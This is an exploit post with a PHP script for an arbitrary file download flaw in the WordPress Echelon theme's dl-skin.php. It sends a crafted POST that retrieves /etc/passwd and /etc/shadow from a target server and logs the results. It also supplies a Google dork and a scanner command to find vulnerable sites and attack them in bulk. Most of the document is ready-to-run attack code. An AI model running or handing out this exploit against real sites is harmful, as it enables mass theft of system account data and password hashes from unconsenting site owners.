*Name:*
Wordpress A.F.D Theme Echelon / INURL - BRASIL

*Description:*
This exploit allows attacker to download any writable file from the server

*Usage info:*
Put the path of the file in the file's field of the exploit ,then click
"Download" button then you get the file directly

File download /etc/passwd & /etc/shadow

Failure consists of exploring a parameter $ _POST file
/wp-content/themes/echelon/lib/scripts/dl-skin.php

The following fields are exploited for Arbitrary File Download
*POST:*
_mysite_download_skin={$config['file']}&submit=Download
ex:
_mysite_download_skin=/etc/passwd&submit=Download

*Exploit:*



<?php

#===============================================================================
# NAME:         Wordpress A.F.D Theme Echelon
# TIPE:         Arbitrary File Download
# Google DORK:  inurl:/wp-content/themes/echelon
# Vendor:       www.wordpress.org
# Tested on:    Linux
# EXECUTE:      php exploit.php www.alvo.com.br
# OUTPUT:       EXPLOIT_WPAFD_Echelon.txt
# AUTOR:        Cleiton Pinheiro
# Blog:         http://blog.inurl.com.br
# Twitter:      https://twitter.com/googleinurl
# Fanpage:      https://fb.com/InurlBrasil
# GIT:          https://github.com/googleinurl
# YOUTUBE       https://www.youtube.com/channel/UCFP-WEzs5Ikdqw0HBLImGGA
#
#
------------------------------------------------------------------------------
#  Comand Exec Scanner INURLBR:
# ./inurlbr.php --dork 'inurl:/wp-content/themes/echelon' -q 1,6 -s
save.txt --comand-all "php exploit.php _TARGET_"
#
------------------------------------------------------------------------------
# Download Scanner INURLBR:
# https://github.com/googleinurl/SCANNER-INURLBR
#===============================================================================

error_reporting(1);
set_time_limit(0);
ini_set('display_errors', 1);
ini_set('max_execution_time', 0);
ini_set('allow_url_fopen', 1);
ob_implicit_flush(true);
ob_end_flush();
print empty($argv[1]) ? exit('0x[ERROR]: DEFINA URL / Execute: php
exploit.php www.alvo.com.br') : NULL;
$argv[1] = isset($argv[1]) && strstr($argv[1], 'http') ? $argv[1] : "http://
{$argv[1]}";
!(preg_match_all("#\b((((ht|f)tps?://*)|(www|ftp)\.)[a-zA-Z0-9-\.]+)#i",
$argv[1], $alvo_)) ? exit('0x[ERROR]: DEFINA URL / Execute: php exploit.php
www.alvo.com.br') : NULL;
$config['line'] =
"\n------------------------------------------------------------------------------------------------------------------\n";
$config['alvo'] = $alvo_[0][0];
$config['exploit'] = "/wp-content/themes/echelon/lib/scripts/dl-skin.php";

function __plus() {

    ob_flush();
    flush();
}

function __convertUrlQuery($query) {

    $queryParts = explode('&', $query);
    $params = array();
    foreach ($queryParts as $param) {
        $item = explode('=', $param);
        $params[$item[0]] = urlencode($item[1]);
    }

    return $params;
}

function __request_info($curl, $config) {
    $postDados =
__convertUrlQuery("_mysite_download_skin={$config['file']}&submit=Download");
    foreach ($postDados as $campo => $valor) {
        $postDados_format .= $campo . '=' . ($valor) . '&';
    }

    $postDados_format = rtrim($postDados_format, '&');
    curl_setopt($curl, CURLOPT_POST, count($postDados));
    curl_setopt($curl, CURLOPT_POSTFIELDS, $postDados_format);
    curl_setopt($curl, CURLOPT_URL, $config['alvo'] . $config['exploit']);
    curl_setopt($curl, CURLOPT_USERAGENT, 'Mozilla/' . rand(1, 20) . '.0
(X11; Linux x8' . rand(1, 20) . '_6' . rand(1, 20) . ') blog.inurl.com.br/'
. md5(rand(1, 200)) . '.31 (KHTML, like Gecko) Chrome/26.0.1410.63 Safari/'
. rand(1, 500) . '.31');
    curl_setopt($curl, CURLOPT_REFERER, $config['alvo'] .
$config['exploit']);
    curl_setopt($curl, CURLOPT_SSL_VERIFYHOST, 0);
    curl_setopt($curl, CURLOPT_CONNECTTIMEOUT, 20);
    curl_setopt($curl, CURLOPT_HEADER, 1);
    curl_setopt($curl, CURLOPT_RETURNTRANSFER, 1);
    $corpo = curl_exec($curl);
    $server = curl_getinfo($curl);
    $status = NULL;
    preg_match_all('(HTTP.*)', $corpo, $status['http']);
    preg_match_all('(Server:.*)', $corpo, $status['server']);
    preg_match_all('(Content-Disposition:.*)', $corpo,
$status['Content-Disposition']);
    $info = str_replace("\r", '', str_replace("\n", '',
"{$status['http'][0][0]}, {$status['server'][0][0]}
{$status['Content-Disposition'][0][0]}"));
    curl_close($curl);
    unset($curl);
    return isset($corpo) ? array('corpo' => $corpo, 'server' => $server,
'info' => $info) : FALSE;
}

function main($config,$rest) {

    __plus();
    print "0x " . date("h:m:s") . " [INFO][EXPLOITATION THE FILE]:
{$config['file']}:\n";
    preg_match_all("(root:.*)", $rest['corpo'], $final);
    preg_match_all("(sbin:.*)", $rest['corpo'], $final__);
    preg_match_all("(ftp:.*)", $rest['corpo'], $final___);
    preg_match_all("(nobody:.*)", $rest['corpo'], $final____);
    preg_match_all("(mail:.*)", $rest['corpo'], $final_____);
    $_final = array_merge($final[0], $final__[0], $final___[0],
$final____[0], $final_____[0]);
    $res = NULL;
    if (preg_match("#root#i", $rest['corpo'])) {
        $res.= "0x " . date("h:m:s") . " [INFO][IS
VULN][RESUME][VALUES]:\n";
        $res.=$config['line'] . "\n";
        foreach ($_final as $value) {
            $res.="0x " . date("h:m:s") . " [VALUE]: $value\n";
        }
        $res.=$config['line'];
        __plus();
        file_put_contents('EXPLOIT_WPAFD_Echelon.txt',
"{$config['alvo']}\n{$res}\n", FILE_APPEND);
        print "{$res}[VALUES SAVED]: EXPLOIT_WPAFD_Echelon.txt\n\n";
    } else {

        print "0x " . date("h:m:s") . " [INFO][NOT VULN]\n";
    }
}
print "\r\n0x[EXPLOIT NAME]: Wordpress A.F.D Theme Echelon / INURL -
BRASIL\n";
$config['file'] = '/etc/passwd';
$rest = __request_info($objcurl = curl_init(), $config);
__plus();
print $line;
print "0x " . date("h:m:s") . " [INFO]: {$rest['info']}\n";
print "0x " . date("h:m:s") . " [INFO][TARGET]: {$config['alvo']}\n";
main($config,$rest);
__plus();
$config['file'] = '/etc/shadow';
$rest = __request_info($objcurl = curl_init(), $config);
__plus();
main($config,$rest);
__plus();